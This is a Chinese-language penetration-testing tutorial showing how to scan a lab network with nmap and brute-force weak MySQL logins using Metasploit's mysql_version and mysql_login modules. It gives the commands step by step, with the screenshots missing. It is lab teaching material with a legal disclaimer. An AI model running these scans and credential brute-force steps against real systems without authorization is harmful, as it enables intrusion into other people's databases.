课前声明：

本分享仅做学习交流，请自觉遵守法律法规！

搜索：Kali与编程，学习更多网络攻防干货！

下篇文章将在明天下午五点发布，敬请关注！

一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。那么如何利用Metasploit(msf)进行Mysql弱口令爆破呢？接下来让我们一起学习！

二、资源装备

1.安装好 Kali Linux 的虚拟机一台

2.搭建好Sql server的靶机一个；

3.整装待发的小白一个。

三、战略安排

3.1 设置受害者靶机跟攻击者主机的网络模式为NAT模式，如下图所示。

3.2 查看受害者主机的IP地址，如下图所示。

命令：ifconfig

3.3 针对目标受害者主机进行信息收集，如下图所示。

命令：nmap -sV IP

例子：nmap -sV 192.168.126.170-200

3.4 扫描结果如下图所示，目标攻击者主机开启了3306危险端口。

3.5 利用Metasploit（msf）渗透框架对目标主机进行信息收集，如下图所示。

命令：msfconsole

3.6 利用msf检索SQL相关攻击模块，如下图所示。

命令：search mysql_version

3.7 利用检索到的漏洞利用模块，如下图所示。

命令：use auxiliary/scanner/mysql/mysql_version

3.8 查看相关参数，如下图所示。

命令:show options

3.9 设置参数，如下图所示。

命令：set rhosts 192.168.126.170-200

命令：set threads 50

3.10 运行攻击模块，如下图所示。

命令：run

3.11 返回上层目录，如下图所示。

命令：back

3.12 检索数据库攻击模块，如下图所示。

命令：search mysql_login

3.13 利用检索到的攻击模块，如下图所示。

命令：use auxiliary/scanner/mysql/mysql_login

3.14 查看相关参数，如下图所示。

命令：show options

3.15 设置相关参数，如下图所示。

3.16 设置好参数进行攻击，如下图所示。

命令：run

PS：到此学习完毕，谢谢观看，获取更多干货请持续关注本号！

原创不易，各位看官记得好评加关注哦！你也可点击了解更多，或搜索：Kali与编程，学习更多Kali Linux渗透与白帽编程技巧哦！